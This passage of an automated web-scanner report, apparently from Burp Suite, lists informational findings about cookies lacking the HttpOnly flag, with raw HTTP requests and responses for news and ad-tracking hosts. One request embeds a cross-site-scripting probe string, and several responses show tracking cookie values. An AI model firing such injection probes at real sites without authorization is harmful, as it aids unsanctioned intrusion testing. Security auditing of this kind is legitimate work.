Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=075506e27db2457ab39ca3349aad58aa; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=751919D3B46045639E5A7F4BB4D9E241; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:58 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17030

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.386. http://specials.redacted/A-List/Lifestyle/Famous-escapes.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Famous-escapes.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Famous-escapes.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:57 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA50
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=1609e5a58c494ff581dac6b56594c457; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5969A2C4E44346D5AD9CAFB1687B8DC5; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:57 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.387. http://specials.redacted/A-List/Lifestyle/Mom-kills-teens.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Mom-kills-teens.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Mom-kills-teens.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:12 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=adae2bda89bb456997895c86d0995bea; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=606B6FED01FA4B74AC05FBCA266D2456; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:12 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.388. http://specials.redacted/A-List/Lifestyle/Nathan-Woods-dies.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Nathan-Woods-dies.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Nathan-Woods-dies.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=43c0ed9dcd59405e97e0ca56ecbc5934; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=E67F9D21403E45ABB6A08727A2CBE039; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17060

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.389. http://specials.redacted/A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx?cp-documentid=27453665 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:01 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=44c6713e16484bef8864fe79a72511ae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=FCB994723662439EA7B8A5803A9422E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:01 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23610

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.390. http://specials.redacted/A-List/Lifestyle/Taco-Bell-fights-back.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Taco-Bell-fights-back.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Taco-Bell-fights-back.aspx?cp-documentid=27449852 HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:02 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=603578c5dd754321a5d5f718e6e3719e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=0F1C39FCE6A54EAF8026C0BE98EE9363; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:02 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23189

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.391. http://specials.redacted/A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:14 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA52
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=3dac27f13e6f43ddbdd099e1136b2ed6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C971D4F5C5424720A741D6E2B244FC0D; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:13 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.392. http://specials.redacted/A-List/TV/Reality-show-and-housewives.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /A-List/TV/Reality-show-and-housewives.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /A-List/TV/Reality-show-and-housewives.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:51:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=57c44e4f157449418f258835ff8a2157; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=697F387490984D5091A88C7D9264CF7B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...

17.393. http://specials.redacted/IEIncreaseFont_preview.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /IEIncreaseFont_preview.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /IEIncreaseFont_preview.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA53
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=0506a602688945e5ad28ee84c22b5f61; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=80780BE1B7C941D18D9BC03C02043CA7; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 13283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.394. http://specials.redacted/alphabet.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://specials.redacted
Path:   /alphabet.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /alphabet.aspx HTTP/1.1
Host: specials.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:50:56 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=f2b9f9c8edf64a949f8339bbfbc006f6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8F837BE9C6D04544883F495E86A13FAC; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:56 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 25485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...

17.395. http://statse.webtrendslive.com/dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif?&dcsdat=1296407694920&dcssip=www.scientificamerican.com&dcsuri=/blog/observations/&dcsqry=%3F9edcb%22%3E%3Ca%3E429173c9aec=1&dcsref=http://burp/show/60&WT.co_f=173.193.214.243-2605364368.30126492&WT.vtid=173.193.214.243-2605364368.30126492&WT.vtvs=1296407694981&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Observations:%20Scientific%20American%20Blogs&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ndl=0&WT.ssl=0&WT.es=www.scientificamerican.com/blog/observations/&WT.cg_n=Scientific%20American&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAADAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNAwAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETQAAAAA-

Response

HTTP/1.1 303 Object Moved
Connection: close
Date: Sun, 30 Jan 2011 17:14:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: /dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1296407694920&dcssip=www.scientificamerican.com&dcsuri=/blog/observations/&dcsqry=%3F9edcb%22%3E%3Ca%3E429173c9aec=1&dcsref=http://burp/show/60&WT.co_f=173.193.214.243-2605364368.30126492&WT.vtid=173.193.214.243-2605364368.30126492&WT.vtvs=1296407694981&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Observations:%20Scientific%20American%20Blogs&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ndl=0&WT.ssl=0&WT.es=www.scientificamerican.com/blog/observations/&WT.cg_n=Scientific%20American&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1
Content-Length: 0
Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAEAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVNBAAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"


17.396. http://suzanne-choney.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://suzanne-choney.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: suzanne-choney.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:19:28 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=6046a552d588b2b1ca9c2098d0a526d4; expires=Sat, 25-Jan-2031 02:19:28 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 79989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

17.397. http://team.silverlight.net/tips-and-training/silverlight-tv-59-what-goes-into-baking-silverlight/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://team.silverlight.net
Path:   /tips-and-training/silverlight-tv-59-what-goes-into-baking-silverlight/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tips-and-training/silverlight-tv-59-what-goes-into-baking-silverlight/ HTTP/1.1
Host: team.silverlight.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: graffitibot=88276BAEC15898589CE0128DE781EA8476A1CE3823C4D3FA4426E978A2FDAE634CF23B8AD0FAB134C870F690C10DFE9F670307A7E5E9060A5E8FE2F026AA4A6C2D8AD4364AF5EA28944FC7C079E1CCD15A344DB2A11751939870F26D9651152CAB5DEF057812D9394E1FE6DFD640DF20A36795453E312D77F68CDC4560698170CDD0198C914C388A31C09D86E6F3E4D9BBCECDA61E8CE8FEC911BFFAD5B4DC3CA7BD862D47665D3ECBC5FF177B083C68ECB07C25246C773E70D0A6B7E42A37DC58DC37FCB7C63095473F180490BD41E8DA4F6C86; expires=Sun, 30-Jan-2011 05:23:26 GMT; path=/
X-AspNet-Version: 2.0.50727
Set-Cookie: Graffiti-Post-278=278; path=/
X-Powered-By: ASP.NET
Date: Sat, 29 Jan 2011 23:23:26 GMT
Connection: close
Content-Length: 13643

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta content="text/html; charset=utf-8" http
...[SNIP]...

17.398. http://technolog2.newsvine.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technolog2.newsvine.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: technolog2.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:53:12 GMT
Server: Apache/2.2.14 (Debian)
Vary: negotiate
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=4d47ba7c4a967234cfe2368b17e3e89b; expires=Sat, 25-Jan-2031 02:53:12 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 83448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...

17.399. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:51:08 GMT
Location: http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.61f6d=0129111951; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0|c51F37:61F6D_0_0_0_20BC47_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:51:08 GMT
Content-Length: 226
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1">here</
...[SNIP]...

17.400. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl HTTP/1.1
Host: this.content.served.by.adshuffle.com
Proxy-Connection: keep-alive
Referer: http://msn.whitepages.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=43118469-708a-43ea-a596-af6467b86b10; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 30 Jan 2011 01:29:45 GMT
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:29:44 GMT
Content-Length: 43
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:34:45 GMT;path=/

GIF89a.............!.......,...........D..;

17.401. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://this.content.served.by.adshuffle.com
Path:   /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

